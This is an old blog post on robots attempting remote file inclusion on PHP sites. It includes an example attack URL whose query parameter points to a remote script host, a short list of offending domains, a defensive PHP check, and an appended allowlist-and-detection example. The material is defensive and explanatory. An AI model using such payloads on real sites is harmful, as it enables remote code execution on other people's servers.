April 26, 2008

Robot Hack Attack

Lately some nasty robots have been trying to hack my websites. The method they use is to attach a URL to a page that relies on a query string. For example, a page might have the following valid URL:

    http://myDomain.com/somePage.php?img=3

The nasty robot transforms this URL to:

    http://myDomain.com/somePage.php?img=http://afterwedding.eclub.lv/images

in the hope that my script will execute the script at http://afterwedding.eclub.lv/images (yes, there is a script there).

The defense is really quite simple: any query string that contains "http://" is an offensive robot. My code to deal with them is as follows:

    function check_hack_attack() {
        // A legitimate query string on this site never contains a URL
        if (strpos($_SERVER['QUERY_STRING'], 'http://') !== FALSE) {
            header("HTTP/1.1 400 Bad Request");
            // do a proper custom error 400
            include ("/path/to/error400.php");
            die();
        }
    }

In simple English (pseudo code), this script does the following:

    If the query contains 'http://' {
        Send a 400 error header to the browser
        Send the custom error 400 page to the browser
        Stop processing
    }

Here is a partial list of offending websites:

    http://0xg3458.hub.io/pb.php?

As you can see, it's just a few websites masquerading under a bunch of sub-domains.

    by.ru

I wonder if someone can put a stop to this abuse.

Denny Schlesinger
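The check above does a case-sensitive match on the raw, undecoded query string, so it only recognizes the literal lowercase text "http://". As an added example (not the author's code), the sketch below validates the img parameter against an allowlist so that no request value ever reaches include, and pairs it with a broader form of the query-string test. IMAGE_PAGES, resolve_image_page, query_carries_url, the file names and the remote.example host are all assumptions made for illustration.

```php
<?php
// Added example; file names and sample inputs are assumptions, not the site's code.

// Allowlist: the only files somePage.php may include, keyed by the img number.
const IMAGE_PAGES = [1 => 'img1.php', 2 => 'img2.php', 3 => 'img3.php'];

// Return the allowlisted file for ?img=N, or null for anything else.
function resolve_image_page(string $img): ?string
{
    // ctype_digit accepts only non-empty strings of 0-9, so URLs never pass.
    if (!ctype_digit($img)) {
        return null;
    }
    return IMAGE_PAGES[(int) $img] ?? null;
}

// Broader form of the page's test: decode first, ignore case, more schemes.
function query_carries_url(string $query): bool
{
    $decoded = rawurldecode(rawurldecode($query)); // single and double encoding
    return preg_match('#(?:https?|ftps?|php|data)://#i', $decoded) === 1;
}

// Constructed sample query strings, not captured traffic.
$samples = [
    'img=3',
    'img=99',
    'img=http://remote.example/images',
    'img=HTTPS://remote.example/images',
    'img=http%3A%2F%2Fremote.example%2Fimages',
];

foreach ($samples as $query) {
    parse_str($query, $params);            // decodes values the way $_GET does
    $img  = is_string($params['img'] ?? null) ? $params['img'] : '';
    $file = resolve_image_page($img);      // the only value safe to pass to include
    printf("%-44s url=%-3s include=%s\n", $query,
        query_carries_url($query) ? 'yes' : 'no', $file ?? 'rejected (400)');
}
```

The allowlist is the actual fix; the URL test is useful mainly for flagging and logging the robots, since a request that slips past it still cannot choose what gets included.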
Copyright © Software Times, 2000, 2001, 2003. All rights reserved